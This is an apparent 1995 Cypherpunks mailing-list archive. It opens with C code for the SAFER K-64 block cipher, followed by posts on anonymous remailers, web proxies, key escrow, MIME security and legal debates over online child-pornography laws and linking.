/* 2-point Pseudo-Hadamard Transform (mod 256): q2 = p1+p2, q1 = 2*p1+p2 */
void mat1(unsigned char p1, unsigned char p2, unsigned char *q1, unsigned char *q2)
{
    *q2 = p1 + p2;
    *q1 = *q2 + p1;
}

/* inverse of mat1; not used by encryption, kept for a decryption routine */
void invmat1(unsigned char p1, unsigned char p2, unsigned char *q1, unsigned char *q2)
{
    *q1 = p1 - p2;
    *q2 = -*q1 + p2;
}

void init_tables(void)
{
    /* This portion of the program computes the powers of the primitive
       element 45 of the finite field GF(257) and stores these numbers in
       the table "exptab". The corresponding logarithms to the base 45 are
       stored in the table "logtab". */
    logtab[1] = 0;
    exptab[0] = 1;
    for (i = 1; i <= 255; i++) {
        exptab[i] = (45 * exptab[i-1]) % 257;
        /* 45^128 = 256 does not fit in a byte and is mapped to 0 below;
           the original stored logtab[256] here, one past the end of the
           table, so that element is skipped. */
        if (exptab[i] < 256)
            logtab[exptab[i]] = i;
    }
    exptab[128] = 0;
    logtab[0] = 128;
}

void set_rounds(void)
{
    int rounds;
    do {
        printf("Enter number of rounds (max 12): ");
        if (scanf("%d", &rounds) != 1)
            exit(0);        /* EOF or bad input: stop instead of looping forever */
    } while (rounds < 1 || rounds > 12);
    r = (unsigned char)rounds;
}

void get_plaintext(void)
{
    int i1,i2,i3,i4,i5,i6,i7,i8;
    printf("Enter plaintext as 8 bytes (0-255 separated by spaces)\n");
    if (scanf("%d%d%d%d%d%d%d%d", &i1,&i2,&i3,&i4,&i5,&i6,&i7,&i8) != 8)
        exit(0);
    a1=(unsigned char)i1; a2=(unsigned char)i2; a3=(unsigned char)i3; a4=(unsigned char)i4;
    a5=(unsigned char)i5; a6=(unsigned char)i6; a7=(unsigned char)i7; a8=(unsigned char)i8;
}

void get_key(void)
{
    int i1,i2,i3,i4,i5,i6,i7,i8;
    printf("Enter left half of key as 8 bytes (0-255 separated by spaces)\n");
    if (scanf("%d%d%d%d%d%d%d%d", &i1,&i2,&i3,&i4,&i5,&i6,&i7,&i8) != 8)
        exit(0);
    ka[0]=(unsigned char)i1; ka[1]=(unsigned char)i2; ka[2]=(unsigned char)i3; ka[3]=(unsigned char)i4;
    ka[4]=(unsigned char)i5; ka[5]=(unsigned char)i6; ka[6]=(unsigned char)i7; ka[7]=(unsigned char)i8;
    printf("Enter right half of key as 8 bytes (0-255 separated by spaces)\n");
    if (scanf("%d%d%d%d%d%d%d%d", &i1,&i2,&i3,&i4,&i5,&i6,&i7,&i8) != 8)
        exit(0);
    kb[0]=(unsigned char)i1; kb[1]=(unsigned char)i2; kb[2]=(unsigned char)i3; kb[3]=(unsigned char)i4;
    kb[4]=(unsigned char)i5; kb[5]=(unsigned char)i6; kb[6]=(unsigned char)i7; kb[7]=(unsigned char)i8;
}

void key_schedule(void)
{
    /* append a "parity byte" to each half of the key, ka and kb */
    ka[8] = ka[0]^ka[1]^ka[2]^ka[3]^ka[4]^ka[5]^ka[6]^ka[7];
    kb[8] = kb[0]^kb[1]^kb[2]^kb[3]^kb[4]^kb[5]^kb[6]^kb[7];
    /* derive keys k1, k2, ... k2r+1 from input key ka, kb; k1 is kb itself */
    for (j = 0; j < 8; j++)
        k[0][j] = kb[j];
    /* each byte of the key ka is right rotated by 3 */
    for (j = 0; j < 9; j++)
        ka[j] = (ka[j]>>3) + (ka[j]<<5);
    for (i = 1; i <= r; i++) {
        /* each byte of the keys ka and kb is left rotated by 6 */
        for (j = 0; j <= 8; j++) {
            ka[j] = (ka[j]<<6) + (ka[j]>>2);
            kb[j] = (kb[j]<<6) + (kb[j]>>2);
        }
        /* the key bias is added to give key k2i (from ka, stored in k[2i-1])
           and key k2i+1 (from kb, stored in k[2i]) */
        for (j = 1; j <= 8; j++) {
            k[2*i-1][j-1] = ka[(j+2*i-2) % 9] + exptab[exptab[18*i+j]];
            k[2*i][j-1]   = kb[(j+2*i-1) % 9] + exptab[exptab[18*i+9+j]];
        }
    }
}

void encrypt(void)
{
    for (i = 1; i <= r; i++) {
        /* Key 2i-1 is mixed bit and byte added to the round input */
        a1=a1 ^ k[2*i-2][0]; a2=a2 + k[2*i-2][1]; a3=a3 + k[2*i-2][2]; a4=a4 ^ k[2*i-2][3];
        a5=a5 ^ k[2*i-2][4]; a6=a6 + k[2*i-2][5]; a7=a7 + k[2*i-2][6]; a8=a8 ^ k[2*i-2][7];
        /* The result now passes through the nonlinear layer */
        b1=exptab[a1]; b2=logtab[a2]; b3=logtab[a3]; b4=exptab[a4];
        b5=exptab[a5]; b6=logtab[a6]; b7=logtab[a7]; b8=exptab[a8];
        /* Key 2i is now mixed byte and bit added to the result */
        b1=b1 + k[2*i-1][0]; b2=b2 ^ k[2*i-1][1]; b3=b3 ^ k[2*i-1][2]; b4=b4 + k[2*i-1][3];
        b5=b5 + k[2*i-1][4]; b6=b6 ^ k[2*i-1][5]; b7=b7 ^ k[2*i-1][6]; b8=b8 + k[2*i-1][7];
        /* The result now enters the linear layer */
        mat1(b1,b2,&a1,&a2); mat1(b3,b4,&a3,&a4); mat1(b5,b6,&a5,&a6); mat1(b7,b8,&a7,&a8);
        mat1(a1,a3,&b1,&b2); mat1(a5,a7,&b3,&b4); mat1(a2,a4,&b5,&b6); mat1(a6,a8,&b7,&b8);
        mat1(b1,b3,&a1,&a2); mat1(b5,b7,&a3,&a4); mat1(b2,b4,&a5,&a6); mat1(b6,b8,&a7,&a8);
        /* The round is now completed! */
        printf("after round %d %3d %3d %3d %3d %3d %3d %3d %3d\n",
               (int)i, a1,a2,a3,a4,a5,a6,a7,a8);
    }
    /* Key 2r+1 is now mixed bit and byte added to produce the final cryptogram */
    a1=a1 ^ k[2*r][0]; a2=a2 + k[2*r][1]; a3=a3 + k[2*r][2]; a4=a4 ^ k[2*r][3];
    a5=a5 ^ k[2*r][4]; a6=a6 + k[2*r][5]; a7=a7 + k[2*r][6]; a8=a8 ^ k[2*r][7];
}

int main(void)
{
    init_tables();
    for (;;) {
        set_rounds();
        get_plaintext();
        get_key();
        printf("PLAINTEXT is  %3d %3d %3d %3d %3d %3d %3d %3d\n",
               a1,a2,a3,a4,a5,a6,a7,a8);
        printf("KEY Ka IS     %3d %3d %3d %3d %3d %3d %3d %3d\n",
               ka[0],ka[1],ka[2],ka[3],ka[4],ka[5],ka[6],ka[7]);
        printf("KEY Kb IS     %3d %3d %3d %3d %3d %3d %3d %3d\n",
               kb[0],kb[1],kb[2],kb[3],kb[4],kb[5],kb[6],kb[7]);
        key_schedule();
        encrypt();
        printf("CRYPTOGRAM IS %3d %3d %3d %3d %3d %3d %3d %3d\n\n",
               a1,a2,a3,a4,a5,a6,a7,a8);
    }
    return 0;
}

From dcl at panix.com Thu Sep 14 09:25:16 1995
From: dcl at panix.com (David C. Lambert)
Date: Thu, 14 Sep 95 09:25:16 PDT
Subject: Crimestoppers anon tip mailbox
Message-ID: <199509141625.MAA08120@panix.com>

-----BEGIN PGP SIGNED MESSAGE-----

>> Is anyone in a position to set up a cypherpunks CrimeStoppers mailbox (for
>> use through the remailers)?  You could set up a web-page with instructions
>> and a list of crimes for which there are rewards.
>
>Someone already tried that.  The cops got a copy of the WWW logs and
>started investigating everyone who'd looked at the WWW page...

Right - this was an abduction case in Florida, if memory serves.

> So at the
>least you'd need a bunch of anonymous WWW proxies as well.

I don't see that as a problem.  I'm about to set up at least one of these
myself, and I believe that there are others around - please correct me if
I'm wrong.

In any case, there needn't be a web page to do the actual reporting.
There can be web pages to advertise, and then a simple maildrop for the
tips.
You could even arrange that the maildrop send everything to a remailer
for delivery to a non-advertised address for an extra layer of
protection (in case someone forgot to use a remailer to send the tip in
the first place, or they screwed up in a way that revealed their
identity).

David C. Lambert
dcl at panix.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFhV8KpplsfgM88VAQHwIgP/eO5eQIb6PgraSAGeoWJ4Jvc3F8tTkY2u
ZiBfuWN3XMu8JRUQOAcW7Vs4lfgBBm7HDHe05mbmczQGsMTzhcLErQ1m1uPup+Xw
LJmbI2hWjxmuTZI14zoTAnTeTJt3L2XLwl7BPpkWkB7EIrERpua2FYIfdqArFO4e
AxEsD+ybA/k=
=pcn4
-----END PGP SIGNATURE-----

From potock at cig.mot.com Thu Sep 14 09:38:41 1995
From: potock at cig.mot.com (Richard Potocki)
Date: Thu, 14 Sep 95 09:38:41 PDT
Subject: MIME Security Issues
Message-ID: <199509141641.MAA11889@po_box.cig.mot.com>

Does anybody wish to express any comments regarding MIME security?  I have
read the RFCs and any/all docs I could find on this issue.  I understand
what the security risks are, but I have been unsuccessful in my attempts
to find info regarding what is being done, or has been done, to correct
this.  If I remember correctly, I think I once saw a brief mention of
filters or something.  I am new to this stuff, so any assistance would be
greatly appreciated.

Thank you,
Rick

From hallam at w3.org Thu Sep 14 09:42:30 1995
From: hallam at w3.org (hallam at w3.org)
Date: Thu, 14 Sep 95 09:42:30 PDT
Subject: DD, pedaphiles, and Terrorists, oh my
In-Reply-To:
Message-ID: <9509141640.AA30602@zorch.w3.org>

>> Today's Washington Post (9/14) has a front page article on a bust of
>> 12 computer using pedaphiles.
>> NBC news is saying that Janet Reno will have a news conference
>> later this morning.
>> Tomorrow near NIS&T, the workshop on the Federal Key Escrow Standards
>> will be held.
>> Coincidence?

> I think not..  Kind of like the coincidence that just before any gun
>law votes, some maniac goes on a shooting spree.. ;)

Nope, it's more likely to be because of the telecommunications bill and the
Exon amendment.  They are demonstrating the sufficiency of existing laws.

We never used to see kiddie porn on the internet.  The net would go
ballistic if a picture of a teenage nude was posted.  Recently there has
been a flood of hard core paedophile material.

Phill

From trei at process.com Thu Sep 14 09:59:17 1995
From: trei at process.com (Peter Trei)
Date: Thu, 14 Sep 95 09:59:17 PDT
Subject: [NOISE] Alice's Remailer site (was:Re: Digital Fingerprinting)
Message-ID: <9509141659.AA28685@toad.com>

> From: patrick at Verity.COM (Patrick Horgan)
> > From: Mac Norton
> > To: Patrick Horgan
> > On Wed, 13 Sep 1995, Patrick Horgan wrote:
> > > > > Then, in W.Ky., as in Stockbridge, "You can get
> > > > > anything you want..."? :)
> > > Why do I feel like I'm sitting on the group W bench?
> > I don't know, kid, what you in for?
> Encryption.  And they all moved away from me on the group W bench there,
> talking mean hairy eyeballs and all sorts of things until I said, and
> annoying the NSA, and they all moved back, talking about crime, PEM, PGP,
> and liberty and justice for all;)
> Patrick

I've seen various 'Alice's Restaurant' pastiches, Alice's NNTP server,
Alice's MIT GUI, etc.  I guess it's time to try to do one for crypto....

This song is called Alice's Remailer site and it's about Alice, and the
remailer site, but Alice's Remailer site is not the name of the Remailer
site, it's the name of the song, and that's why I called this song Alice's
Remailer site.

   You can send anything you want through Alice's Remailer site.
   You can send anything you want through Alice's Remailer site.
   Connect right in it's around the back.
   Halfway down that seventeen inch rack.
   You can be anyone you want through Alice's Remailer site.

etc....
Peter Trei
Senior Software Engineer
Purveyor Development Team
Process Software Corporation
http://www.process.com
trei at process.com

From tcmay at got.net Thu Sep 14 10:17:47 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 14 Sep 95 10:17:47 PDT
Subject: Child Porn, Morphing, and Pointers
Message-ID:

At 2:40 PM 9/14/95, Rev. Ben wrote:

>> The bill would expand the definition of child pornography
>> to include any photograph, film, videotape or computer
>> image produced by any means, including electronically by
>> computer, if it depicts or appears to depict a minor
>> engaging in sexually explicit conduct.
>
>If I'm reading this correctly, if I Photoshop a kids face onto the body
>of the latest Playboy centerfold, I'm in violation of this proposed law?

I believe there have already been prosecutions along these lines. For
example, do you think a _comic book_ with child porn themes ("explicit"
art, situations) would not be prosecuted as child porn? I strongly suspect
that a _painting_ of a 7-year-old girl engaged in a sex act would result in
a prosecution.

Keith Henson, amongst others, has long suggested that a good test case will
be the _morphing_ of legal images to make them look like child porn.

This is not a legal list--for that there are several other fora/forums--but
it is clear that the child porn laws are not necessarily aimed at the
protection of specific minor children from "exploitation," as the laws
apply to porn imported from countries where the age of consent is lower,
apply to images of dead children (who can no longer be exploited by the
images), and to "created" images of children (morphing, cut-and-paste,
paintings, etc.)

The laws are clearly aimed at both extinguishing the _market_ for child
pornography and the _thoughts_ themselves, not at the protection of
specific children. (Advocates will argue that by suppressing the production
of child porn markets, future children may be protected....)

The main Cypherpunks theme I can find here is this: anonymous remailers and
Web proxies will be used to access offshore (or indeterminately located)
sites. The Feds will likely come down very hard on any remailers or proxies
found to be "trafficking" in such materials.

I'm going to post to this list a recent post I made to the Cyberia list
about whether pointers are the same as transfers.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From tcmay at got.net Thu Sep 14 10:24:28 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 14 Sep 95 10:24:28 PDT
Subject: Linking = Showing = Transferring?
Message-ID:

I posted this to the Cyberia mailing list, but think it has some
implications for Cypherpunks as well. And, I'm responding to Duncan
Frissell, one of our own.

(I don't advise subscribing to Cyberia unless legal issues interest you and
you have the time for another high-volume mailing list. Still, some bright
folks there--as well as some dullards. David Friedman just joined the list.
To subscribe, send a message to listserv at listserv.cc.wm.edu with the
message body of subscribe cyberia-l YourNameHere.)

>
>To:cyberia-l at warthog.cc.wm.edu
>From:tcmay at got.net (Timothy C. May)
>Subject:Linking = Showing = Transferring?
>
>
>As good a chance as any to extend my "showing = telling" point...
>
>At 9:32 AM 9/14/95, Duncan Frissell wrote:
>
>>And my favorite: "What if the student merely includes *links* to
>>the above on his web page?"
>>Of course racist images/messages are
>>always and everywhere as legal as church on a Sunday although they
>>may carry civil liability in limited cases -- not a problem for
>>judgment-proof students.
>...
>>"Is the URL the page itself? --- Unanswered philosophical questions
>>of the wired age."
>
>_Linking_ is effectively _showing_, given the point-and-click mechanics of
>hypertext. This is a situation anticipated by authors (e.g. Ted Nelson),
>but is now coming to the fore.
>
>Granted, providing a link is not the same as actually _including_ the
>material the link points to, but it is very, very close. Arguably, the
>same.
>
>(Example: I create a home page with links to many images that are child
>pornography by U.S. standards. The images themselves may be initially
>stored in URLs that are in countries with different standards for consent,
>e.g., Denmark or Thailand. Have I violated the child porn laws? Arguably,
>I am "making available" these materials, but all I have done is to provide
>the _pointers_. The readers of my home page are the actual downloaders,
>not me.)
>
>I can imagine rebuttals to this position, arguing that an author who
>includes URLs to other places is doing nothing different than an author
>who includes footnoted references to other works (and surely we all agree
>that footnotes are not copyright infringements of any sort).
>
>However, look at how the Web is being used. Home pages that have
>compilations of interesting things are effectively the works! It is as if
>the original materials are being stored on those home pages themselves!
>
>There is a _technological_ and _propertarian_ fix to this: controlled or
>paid access to the URLs under question. The "gatekeeper" function shifts
>to the actual material under question.
>
>But there are many new questions.
>
>And Duncan's specific point remains:
>
>-- is it a violation of pornography laws (perhaps campus rules) to have a
>home page with links to URLs containing pornographic images?
>
>-- is it a violation of _child pornography_ laws to have a home page with
>links to URLs containing child pornography images? (The URLs could be
>offshore, perhaps in jurisdictions where the age of consent is much
>different than in the U.S., e.g., Denmark or Thailand.)
>
>-- is it a violation of national security laws to have a home page with
>links to URLs containing national defense secrets? (The URLs could be
>offshore.)
>
>-- is it a violation of copyright/patent laws to have home pages with
>pointers to protected material? (Songs, written works, images, inventions,
>etc.)
>
>And so on....
>
>--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From m5 at dev.tivoli.com Thu Sep 14 10:53:17 1995
From: m5 at dev.tivoli.com (Mike McNally)
Date: Thu, 14 Sep 95 10:53:17 PDT
Subject: Child Porn, Morphing, and Pointers
In-Reply-To:
Message-ID: <9509141753.AA02480@alpha>

Timothy C. May writes:
 > Keith Henson, amongst others, has long suggested that a good test case will
 > be the _morphing_ of legal images to make them look like child porn.

And of course the subsequent test case on a software product that
automatically morphs a .JPG of a 32-year-old model into an image of an
eight-year-old.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX      |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From hallam at w3.org Thu Sep 14 10:55:48 1995
From: hallam at w3.org (hallam at w3.org)
Date: Thu, 14 Sep 95 10:55:48 PDT
Subject: Annonymous Web proxies.
Message-ID: <9509141754.AA30799@zorch.w3.org>

There has been a lot of debate about setting up of anonymous Web proxies.
There are many thousand already deployed.  Any Web proxy which does not
keep logs is effectively an anonymous Web proxy.  Just download the CERN
server and run it.

http://www.w3.org/hypertext/WWW/Daemon/Status.html

The point about monitoring such sites is an apt one.  I work under the
assumption that I am monitored because if I was a spook I would be
monitoring me.  Most of the discoveries of security holes arrive at my
door sooner rather than later.  I would have monitored the communist party
for the same reason; it was one of the most obvious places for the
soviets to attempt infiltration, the other being the authoritarian
establishment right.

Phill

From frissell at panix.com Thu Sep 14 10:57:10 1995
From: frissell at panix.com (Duncan Frissell)
Date: Thu, 14 Sep 95 10:57:10 PDT
Subject: NSA on GAK
Message-ID: <199509141755.NAA23065@panix.com>

At 12:01 PM 9/14/95 -0400, Adam Shostack wrote:
>
>	"Help me understand here.  You say that serious users of
>encryption don't use software distributed via network.  In that case,
>you would have no objection to PGP being exported, as serious users of
>encryption don't use it?"

Were that true, then they wouldn't be on the Internet either because the
Internet runs on software distributed over the Internet.

DCF

From perry at piermont.com Thu Sep 14 11:03:49 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 14 Sep 95 11:03:49 PDT
Subject: MIME Security Issues
In-Reply-To: <199509141641.MAA11889@po_box.cig.mot.com>
Message-ID: <199509141803.OAA20674@frankenstein.piermont.com>

Richard Potocki writes:
> Does anybody wish to express any comments regarding MIME security.

You are looking for the MOSS specifications. They are fairly obvious in
the way they work.

Perry

From fair at clock.org Thu Sep 14 11:18:54 1995
From: fair at clock.org (Erik E. Fair (Time Keeper))
Date: Thu, 14 Sep 95 11:18:54 PDT
Subject: Mixmaster posting poll
Message-ID:

At 11:40 9/13/95, Lance Cottrell wrote:
>
>I seem to recall that someone on this list wrote some mail2news software,
>Who was it and which standard did it follow (if either). Has anyone installed
>it? Is anyone else planning to install it. I will install a gateway when I
>get my T1 (in a couple of months).

Rich Salz wrote mail2news, based on some ugly stuff I wrote, ages ago.

	Erik Fair

From danisch at ira.uka.de Thu Sep 14 11:19:32 1995
From: danisch at ira.uka.de (Hadmut Danisch)
Date: Thu, 14 Sep 95 11:19:32 PDT
Subject: Explaining Zero Knowledge to your children
Message-ID: <9509141818.AA05757@elysion.iaks.ira.uka.de>

There is a paper about explaining Zero Knowledge methods in simple words.
It's titled "Explaining Zero Knowledge Authentication to your children" or
something similar.  It's said to be in the proceedings of some conference.

Does anybody know where to find it?

Thanks
Hadmut

From bdavis at thepoint.net Thu Sep 14 11:29:46 1995
From: bdavis at thepoint.net (Brian Davis)
Date: Thu, 14 Sep 95 11:29:46 PDT
Subject: cryptography eliminates lawyers?
In-Reply-To:
Message-ID:

On Thu, 14 Sep 1995, Duncan Frissell wrote:

>
>
> On Wed, 13 Sep 1995, Black Unicorn wrote:
>
> > But won't clients insist on proper credentials in one form or another?
> > Doesn't the practicality and accountability of a centralized authority
> > (or several authorities) provide the best answer to this?  Who is going
> > to accept my signature promising that I did indeed get a law degree and
> > pass the bar?
>
> An educational institution can certify its own graduates --- it does
> now.  Competing credentialing institutions is exactly what I would be
> looking for as opposed to today's coercive monopoly.
>
> No matter how skilled, it is illegal for an unlicensed person to practice
> law, medicine, or many other professions in any state.  The nets weaken
> these restrictions because they allow action at a distance.
>

That's certainly true.  But what about liability insurance?  That's one of
the key aspects of my retention of a professional.  Being cynical, and
somewhat knowledgeable about human error, I want to be sure there's
someone to turn to if the advice/treatment/whatever turns out not only to
be wrong in hindsight, but in foresight.

Having taken, and passed, bar exams in three states (3 for 3 for those of
you thinking I was forum shopping), I can tell you that they weren't that
big of a barrier.  You can flunk (over several tries) by failing to
prepare at all, panicking, being an extremely poor test taker, or, well
...

> Note the other effects of the nets.  They make it hard to tell that you
> *are* working which reduces the impact of regulations of work by
> "illegal aliens."  Thus if I am wandering through the South of France
> while writing the 'Great American Novel' I am unlikely to get busted for
> violation of work restrictions.  The nets expand the number of jobs I
> can do while innocently wandering the South of France.  I can or will
> soon be able, for example, to manage a large international corporation
> from anywhere.
>
> DCF
>
> "Who actually prefers Le Massif Central to those hot and crowded southern
> climes."
>

Just wondering about liability issues after state accrediting is dead.

EBD

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away!  I get treated worse in person every day!!
From bdavis at thepoint.net Thu Sep 14 11:38:59 1995 From: bdavis at thepoint.net (Brian Davis) Date: Thu, 14 Sep 95 11:38:59 PDT Subject: AOL Porno In-Reply-To: Message-ID: On Thu, 14 Sep 1995, Duncan Frissell wrote: > Will the federal prosecutors and Fibbies on this list please > emphasize that the Internet was not involved in the AOL kiddie porn > case. The Internet has enough opportunities for bad publicity as > it is. > > DCF > > "Who wonders: How it is that CompuServe was able to exist from 1979 > to the arrival of Prodigy and AOL without major sex, and drugs, and > rock and roll problems?" > I would be happy to, but no member of the media has asked me. I'm available for photo ops too! :-) (for the humor impaired) I am blasting the Rimm "study" in the next issue of the Federal Lawyer. Does that count? EBD Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From anonymous at freezone.remailer Thu Sep 14 11:43:05 1995 From: anonymous at freezone.remailer (anonymous at freezone.remailer) Date: Thu, 14 Sep 95 11:43:05 PDT Subject: DD, pedaphiles, and Terrorists, oh my Message-ID: <199509141842.OAA22090@light.lightlink.com> September 13, 1995 PRESS BRIEFING BY MIKE MCCURRY [Snip] MR. MCCURRY: ... [The President]'ll be making some fairly significant news on Thursday. So he'll be very busy next week. Q News? What kind of news? Q News on what? MR. MCCURRY: You'll see next week. [Snip] Q What about Thursday -- Q Are you going? MR. MCCURRY: Half and half, I think. I'll go -- I think there are some days that look more political; I don't think it's necessary for me to be there. Q What will be the general topic on Thursday? MR. MCCURRY: On Thursday? Technology. 
[Snip to end] URL: http://docs.whitehouse.gov/white-house-publications/ 1995/09/1995-09-13-press-briefing-by-mike-mccurry.text ---------- Any scuttlebutt that computer security, the Internet or encryption are the "technology?" Or related to the NYT spin today on LEA-web-snooping: "We are not going to permit exciting new technology to be misused to exploit and injure children," Attorney General Janet Reno said today in announcing the arrests. The culmination of the inquiry by the Federal Bureau of Investigatlon comes at a time when the agency has needed some favorable attention to offset a string of incidents that have cast it in a negative light. Its officials have come under fire for their role in the siege at Waco, Tex., the standoff with a white separatist in Idaho and, most recently, over an attempt to cover up aspects in the Idaho incident. Or diversion from the allegations of Special Agent Whitehurst that Feeb lab rats and bosses are corrupt -- tar-morphing even Golden Boy Freeh. Pray that kid-loving Reno HRTs the abusive brats. From tms at TIS.COM Thu Sep 14 11:45:11 1995 From: tms at TIS.COM (Thomas M. Swiss) Date: Thu, 14 Sep 95 11:45:11 PDT Subject: [NOISE] Alice's Remailer site In-Reply-To: <9509141659.AA28685@toad.com> Message-ID: <199509141752.NAA12989@ziggy.tis.com> More noise. Sorry, but I can't resist: "Peter Trei" writes: >This song is called Alice's Remailer site and it's about Alice, and the >remailer site, but Alices Remailer site is not the name of the Remailer >site, it's the name of the song, and that's why I called this song Alice's >Remailer site. > > You can send anything you want through Alices Remailer site. > You can send anything you want through Alices Remailer site. > Connect right in it's around the back. > Halfway down that seventeen inch rack. > You can be anyone you want through Alice's Remailer site. (with apologies to Arlo...) 
You know, if one person, just one person, uses that remailer, they may think he's just paranoid, and they'll ignore him. And if two people, two people, do it -- in reply to each other -- they may think they're both crooks but they won't be able to bust either of them. And if THREE people do it. Three -- Can you imagine three people loggin' in, sending mail through Alice's Remailer site and loggin' out? They may think it's an ORGANIZATION!

And can you imagine FIFTY people a day? I said FIFTY people a day -- loggin' in, sending mail through Alice's Remailer site and loggin' out? And friends, they may think it's a MOVEMENT, and that's what it is:

THE ALICE'S REMAILER SITE ANTI-E-MAIL-SNIFFING MOVEMENT!--

and all you gotta do to join is to flip the bird to those traffic-sniffin' spooks out there -- With feelin' ...

-Tom Swiss / tms at tis.com

From patrick at Verity.COM Thu Sep 14 11:47:24 1995
From: patrick at Verity.COM (Patrick Horgan)
Date: Thu, 14 Sep 95 11:47:24 PDT
Subject: CYPHERPUNK considered harmful.
Message-ID: <9509141843.AA21226@cantina.verity.com>

Just a couple of comments, one on a question and one on an answer.

>
> >Q: Aren't LEAs worried that strong encryption will make it more
> >difficult for them to catch crooks?

If this is for non-cypherpunks, you should say what an LEA is. They wouldn't understand your question. (Shoot, some cypherpunks are probably going, "Huh?")

>
> >Q: What's this 'key escrow' thing?
> >
> >A: Some government agencies have been trying to figure out methods which
> >simultaneously permit US citizens to use strong cryptography against
> >criminal eavesdroppers, while retaining the ease with which LEAs can
> >currently tap your calls. The schemes generally involve something
> >mistitled 'key escrow', in which copies of cryptographic keys would be
> >stored at sites accessible by LEAs.
> >
> 'key escrow' is a code word for government access to the unencrypted
> message.
> It is a persistent theme, dating back to the NSA's CCEP in about

You probably need to say what the NSA is, and certainly have to identify CCEP.

Patrick

 _______________________________________________________________________
/ These opinions are mine, and not Verity's (except by coincidence;).   \
|       (\                                                               |
| Patrick J. Horgan         Verity Inc.                  \\    Have      |
| patrick at verity.com      1550 Plymouth Street          \\ _  Sword     |
| Phone : (415)960-7600     Mountain View                \\/   Will      |
| FAX   : (415)960-7750     California 94303            _/\\   Travel    |
\___________________________________________________________\)__________/

From bdavis at thepoint.net Thu Sep 14 12:08:42 1995
From: bdavis at thepoint.net (Brian Davis)
Date: Thu, 14 Sep 95 12:08:42 PDT
Subject: NSA on GAK
In-Reply-To: <199509141755.NAA23065@panix.com>
Message-ID:

On Thu, 14 Sep 1995, Duncan Frissell wrote:

> At 12:01 PM 9/14/95 -0400, Adam Shostack wrote:
> >
> > "Help me understand here. You say that serious users of
> >encryption don't use software distributed via network. In that case,
> >you would have no objection to PGP being exported, as serious users of
> >encryption don't use it?"
>
> Were that true, then they wouldn't be on the Internet either because the
> Internet runs on software distributed over the Internet.
>

And that's what we call double jeopardy. Not allowed by the Constitution!

> DCF
>
>

EBD

From sameer at c2.org Thu Sep 14 12:18:11 1995
From: sameer at c2.org (sameer)
Date: Thu, 14 Sep 95 12:18:11 PDT
Subject: An opportunity not to be missed
In-Reply-To:
Message-ID: <199509141913.MAA08819@infinity.c2.org>

How did they get the logs? Did they have a court order? And web logs only show the site things come from, not the username things are coming from.

If someone wants to set something up on c2.org, you're quite welcome to. Check out http://www.c2.org (currently under renovation.. my graphic designer is on vacation so I'm awaiting his return before we can revamp the graphics, basically.)

The ecash problem, of course, is a problem.
> > On Thu, 14 Sep 1995, Frank Stuart wrote:
> >
> > > Is anyone in a position to set up a cypherpunks CrimeStoppers mailbox (for
> > > use through the remailers)? You could set up a web-page with instructions
> > > and a list of crimes for which there are rewards.
>
> Someone already tried that. The cops got a copy of the WWW logs and
> started investigating everyone who'd looked at the WWW page... So at the
> least you'd need a bunch of anonymous WWW proxies as well.
>
> There's also the problem that the current ecash systems do not provide
> payee anonymity, so if you pay informers with ecash they can be traced if
> the bank and payer collude.
>
> Mark
>

--
sameer                                          Voice:   510-601-9777
Network Administrator                           FAX:     510-601-9734
Community ConneXion: The NEXUS-Berkeley         Dialin:  510-658-6376
http://www.c2.org (or login as "guest")                  sameer at c2.org

From liberty at gate.net Thu Sep 14 12:24:35 1995
From: liberty at gate.net (Jim Ray)
Date: Thu, 14 Sep 95 12:24:35 PDT
Subject: Things the LEAs don't want to admit.
Message-ID: <199509141920.PAA55734@tequesta.gate.net>

-----BEGIN PGP SIGNED MESSAGE-----

Andrew Loewenstern writes:

>Encryption prevents 'fishing expeditions' and
>unauthorized monitoring; this is what the LEAs don't want to admit.

AMEN, Andrew. Another thing the LEAs don't want to admit is the incredible (cost and otherwise) effectiveness of the "Honey Trap" (SEX!) when used by (or against) them. Cash isn't the only way to recruit another Aldrich Ames(sp?), and sex is a lot easier to launder.
JMR

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

-----END PGP SIGNATURE-----

Regards, Jim Ray

"When making public-policy decisions for the government, I think one should ask oneself which technologies would best strengthen the hand of a police state. Then, do not allow the government to deploy those technologies." -- Phillip Zimmermann, talking to himself. (Congress sure-as-hell wasn't paying attention!)
-----------------------------------------------------------------------
PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8
Key id. # E9BD6D35                                        James M. Ray
-----------------------------------------------------------------------
Help Phil! email zldf at clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________

From koontz at MasPar.COM Thu Sep 14 12:32:24 1995
From: koontz at MasPar.COM (David G. Koontz)
Date: Thu, 14 Sep 95 12:32:24 PDT
Subject: GAK
Message-ID: <9509141935.AA09315@argosy.MasPar.COM>

>So would an FBI camcorder in every room of every house.
>The question is where to draw the line, and I'd rather
>let the lines draw themselves, as opposed to having
>citizens be compelled to draw them. The telephone
>system, Mr. Freeh's preferred analog, is inherently
>susceptible to tapping, but what if it were not, and
>every telephone were required to be equipped with
